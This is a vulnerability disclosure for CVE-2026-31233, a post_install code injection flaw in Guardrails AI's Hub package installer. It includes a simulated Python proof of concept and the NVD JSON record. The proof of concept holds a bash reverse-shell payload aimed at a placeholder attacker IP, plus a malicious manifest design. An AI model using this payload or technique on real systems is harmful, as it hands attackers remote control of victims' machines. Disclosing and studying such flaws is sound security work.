CVE-2026-31233

# Proof of Concept for CVE-2026-31233 # This script simulates a malicious package manifest creation. import json # 1. Define the malicious payload (e.g., reverse shell) # In a real attack, this would be hosted on the attacker's server. malicious_script_content = "#!/bin/bash\nbash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" # 2. Construct the malicious manifest # The 'post_install' field points to the malicious script malicious_manifest = { "package_name": "fake-validator", "version": "1.0.0", "post_install": "setup.sh", # Vulnerability: Untrusted path executed "manifest_version": "1.0" } # 3. Simulate the vulnerable installation process def vulnerable_install(manifest): print(f"[*] Installing {manifest['package_name']}...") script_path = manifest['post_install'] # VULNERABLE CODE: Executing script path from untrusted source without validation print(f"[!] Executing post_install script: {script_path}") # os.system(script_path) # This is where the RCE happens if __name__ == "__main__": print("--- Malicious Manifest Generated ---") print(json.dumps(malicious_manifest, indent=2)) print("\n--- Simulating Victim Installation ---") vulnerable_install(malicious_manifest)

{"cve": {"id": "CVE-2026-31233", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:16:51.627", "lastModified": "2026-05-14T20:17:02.600", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Guardrails AI thru 0.6.7 contains a code injection vulnerability (CWE-94) in its Hub package installation mechanism. When installing validator packages via guardrails hub install, the system retrieves a manifest from the Guardrails Hub and dynamically executes a script specified in the post_install field. The script path is constructed from untrusted manifest data and executed without proper validation or sanitization, allowing remote code execution. An attacker who can publish malicious packages to the Hub can inject arbitrary code that will be executed on any system where a victim installs the malicious package."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/guardrails-ai/guardrails", "source": "[email protected]"}, {"url": "https://www.notion.so/CVE-2026-31233-35d1e13931888142a954fb3f50ee0c94", "source": "[email protected]"}]}}